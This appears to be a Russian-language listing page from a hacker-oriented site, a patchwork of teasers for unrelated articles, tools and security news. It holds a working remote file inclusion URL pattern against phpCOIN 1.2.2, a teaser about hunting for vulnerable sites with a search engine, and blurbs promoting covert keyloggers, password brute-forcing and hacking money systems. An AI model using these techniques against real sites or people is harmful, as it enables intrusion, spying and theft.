Эта статья будет интересна в первую очередь начинающим хакерам. В ней я попытаюсь объяснить как применять php инклудинг. Сидя вечером 20 декабря Интернете я прочитал о только что найденной уязвимости в форуме phpCOIN. Статья называлась "PHP-инклудинг в phpCOIN v.1.2.2" Вот как выглядит данная уязвимость: http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=http://[location] Затем я пошел на www.altavista.com, набил для поиска phpCOIN 1.2.2 и стал разгребать найденные ссылки

Программа для обнаружения и удаления различных шпионских модулей, и прежде всего программ маскировки следов (т.

Видео-ролик по подбору WEP-ключа в беспроводной сети.

Привет, я продолжаю дальше свое повествование и подумал, что было бы неплохо описать в этой главе эвристическую классификацию. Помнишь я упоминал про систему порождающих правил и поиск решения в глубину и ширину? Правильно, что не помнишь, потому что не упоминал

Специальный поисковик для кодеров - ищет в исходниках! На настоящий момент им проиндексировано около 260 миллионов строк кода, так что думаю искомое сочетание ты обязательно отыщешь.

Организация, занимающаяся исследованиями Интернета.

French Security Incident Response Team - французский багтрак, регулярно обновляемый набор уязвимостей, эксплоитов и предупреждений о вирусах.

Творческий Союз "Ромашки" представляет: взлом www.

Утилита для подсчета трафика, передаваемого по локальной сети, и его графического отображения.

Интернет, как известно, это и огромная свалка и золотое дно одновременно. Что правит миром? Что самое главное в жизни и, пожалуй, в интернете? Ответ – деньги. Хотя, Данила Бодров со мной не согласился бы. :) Чтобы добыть денег надо взломать систему, которая бы производила операции с валютой, и желательно без такой крутой защиты как у eBay

Книга о создании культовой игры и модификаций для нее.

Однажды Хуккерс зашел на сайт веб мэйл ру, а тот вдруг перестал работать. Хуккерс сообразил - дело не чисто, а значит есть почва для 0-дей сплоита. Но Хуккерс был молод и неопытен, и не знал еще ни перла ни php, а что касается asp .net - его тогда и в проекте не было

Патч для устранения серьезной уязвимости в рендеринге wmf-файлов.

Программа сканирует журналы регистрации доступа для Apache Web сервера и выполняет произвольные команды при обнаружении определенной последовательности URL.

arp_spoofer (написанный на С с использованием PF_PACKET сокетов) позволяет выполнять произвольные манипуляции с ARP пакетами, в т.

Качает файлы по локальной сети (NetBios, TCP/IP) с докачкой, что позволяет докачать файл с того места, где оборвалась его закачка, а не начинать скачивать его заново.

Warning! Данное поздравление содержит спойлер к секретному плану празднования Нового Года, разработанному миллионами Россиян. Будьте бдительны!

Когда кто-то лезет на порносайт (или сайт с кряками) этот самый сайт "втихую" загружает на ваш компьютер небольшую программку (это даже не вирус, хотя некоторые антивирусы определяют её как таковой), которая немного "правит" ваш системный реестр.

Доля рынка детища Microsoft Internet Explorer’а впервые за многие годы упала ниже 90 %. Это ли не благо, братья? Истинное благо, говорю я вам, но почему же IE по прежнему занимает 87 %? Давайте чуть-чуть забежим назад. Добившись доминирующего положения на рынке ПО, корпорация нацелилась стать монополистом и без труда им стала, продолжая давить конкурентов — где более качественным, или, по крайней мере, дружелюбным и своевременным продуктом, где сомнительными сделками, где мощными рекламными и PR-кампаниями

Программа для проверки изменений на FTP серверах - производит их мониторинг и при наличии изменений на сервере (появление, удаление или обновление файлов) извещает об этом в виде отчета, в том числе по e-mail.

Введение С помощью небольших программ – клавиатурных шпионов (keyboard loggers) - Вы можете узнать, что делали на Вашем компьютере, пока Вас не было в офисе или дома. Если же Вы сумеете подложить их на чужой компьютер, то получите возможность узнавать практически обо всех действиях хозяина компьютера

Введение

Программа: myEZshop Shopping Cart Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения. 1. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "GroupsId" и "ItemsId"в сценарии "admin.php"

Данная статья не претендует на звание памятки "кул-хацкеру". Ниже будут описаны ситуации, которые возможны при задержании подозреваемого в совершении компьютерного преступления "кул-хацкера".

Почитав пару статей, несколько глав книги про экспертные системы, описание языка CLIPS, я задался целью создать свою систему. Цель проекта была ясна – создание некоторой модели мышления робота посредством языка CLIPS в среде Windows как приложение (старец в роли Эйнштейна сказал, чтобы С, С++ я не использовал ни под каким предлогом, после недолгой дискуссии я согласился)

Backup @Home backup 2005 v3.

Сегодняшняя статья затрагивает весьма актуальную тему среди начинающих хацкеров и прочих сетевых маргиналов, а именно тему сетевых атак и вредоносных действий. Не секрет, что большинство высококвалифицированных пользователей не редко используют свои знания в направлениях, вступающих в противоречия с законодательством нашей глубоко любимой родины

Перебор паролей к phpBB по словарю.

[first day...]

Коровка

Сидя обычным вечером в обычной обстановке в чате хакера, с флудом, матом, клонами, я размышлял над проблемой отсутствия модераторов. Тут я и решил немного "пощупать" чат. У меня давно сложилось мнение о работе чата, я давно догадывался, что это вовсе не скрипты, а демон, который написан на delphi (ошибки иногда знакомые вылетали)

Эта программа ведет подсчет исходящего/входящего траффика и времени нахождения в Интернете, а так же считает затраченные на это средства.

Хотите сделать свой звуковой CD который будет читаться любым музыкальным центром, но по большей части не будет играться в Windows-проигрывателях? Это довольно просто, такая пассивная защита не слишком труда в создании (ради справедливости отмечу, что и обойти ее проще простого)

Программа для кодирования бинарников для использования в шелл-коде.

Утилита для обнаружение и удаления разнообразных интернет-червей и backdoors - Mytob, Mydoom, Beagle, Netsky, Sasser, Blaster Zafi, Mabutu, Startpage и некоторрых других.

Утилита для обнаружения и удаления наиболее распространённых вирусов.

Онлайновые игры для хакеров довольно распространены, однако сегодня я предлагаю тебе довольно необычный конкурс - UCSB International Capture The Flag или iCTF. 

NVC [No_Valid_Code] - программа служащая для зашифрования любого из ваших файлов при помощи пароля.

Транснациональная корпорация Microsoft обновила два своих ключевых продукта (помимо собственно операционных систем линейки Windows): СУБД SQL Server 2005 и средство разработки Visual Studio 2005. Оба они связаны между собой, поскольку Visual Studio оптимизирована для разработки Web-сервисов, которые становятся неотъемлемой частью SQL Server

DansGuardian – фильтрующий прокси, который использует для Squid.